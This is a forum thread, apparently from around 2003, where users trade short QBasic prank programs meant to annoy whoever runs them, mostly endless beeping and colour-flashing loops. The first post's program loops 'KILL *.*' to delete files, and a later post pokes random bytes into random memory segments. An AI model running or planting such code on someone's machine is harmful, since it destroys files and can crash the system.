Posts: 37
Threads: 8
Joined: May 2003
HAHAAHA
this is my first post
RULES:
1) no more then 10 lines
2) must have the effect of the person wanting to throw there computer out the window.
*note this code wont work, i forgot the chdir statement, but just an idea.
Code:
CLS
DO
SCREEN 13
BEEP
CHDIR *.* : KILL *.*
FOR x = 1 to 2
PAINT (1,1),x
NEXT
LOOP
LA BLA BLA
Posts: 1,813
Threads: 284
Joined: Mar 2003
Posts: 199
Threads: 2
Joined: May 2003
Code:
VIEW PRINT 1 TO 25
DO
COLOR INT(RND * 16), INT(RND * 16)
PRINT "\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/"
SOUND RND * 10000, RND / 2
LOOP
url=http://www.spreadfirefox.com/?q=affiliates&id=60131&t=79]
![[Image: safer.gif]](http://sfx-images.mozilla.org/affiliates/Buttons/120x60/safer.gif)
[/url]
END OF LINE
.
Posts: 2,765
Threads: 138
Joined: Nov 2002
Code:
FOR s = 37 TO 32767
LOCATE 1, 1: PRINT s
LOCATE 2, 1: PRINT 32767 - s
SOUND s, 1
NEXT
I got a headache after 2000
Back by popular demand!
I will byte and nibble you bit by bit until nothing remains but crumbs.
Posts: 1,439
Threads: 15
Joined: Apr 2003
Posts: 2,765
Threads: 138
Joined: Nov 2002
Quote:do
loop
i think mine it more annoying. BTW: made it to 6000
Back by popular demand!
I will byte and nibble you bit by bit until nothing remains but crumbs.
Posts: 3,288
Threads: 167
Joined: Nov 2001
Do
Def Seg = Int(Rnd*32767)
Poke Int(Rnd*32767),Int(Rnd*255)
Loop
;*)
Posts: 115
Threads: 6
Joined: Feb 2003
DO
PLAY "MB T255 L64 A"
FOR I = 0 TO 79
BEEP
COLOR INT(RND * 16), INT(RND * 7)
PRINT CHR$(INT(RND * 128) + 128);
BEEP
NEXT
PRINT
LOOP
very F***ing song remains the same
To everyone who sucks-up for the fame
Out of strength you know we speak the truth
Every trend that dies is living proof
MasterMinds Software
Posts: 222
Threads: 23
Joined: May 2003
SOUND 5000,10000
or, more subtle:
SOUND 10000,10000
In a race between a rock and a pig, don't varnish your clams." -- "Dilbert"
Posts: 1,813
Threads: 284
Joined: Mar 2003
Quote:Do
Def Seg = Int(Rnd*32767)
Poke Int(Rnd*32767),Int(Rnd*255)
Loop
I've gotta say, this is the most annoying program ever! I mean, colours and sounds and not being able to exit easily are annoying, but fucking with your IE ports is worse!
earn.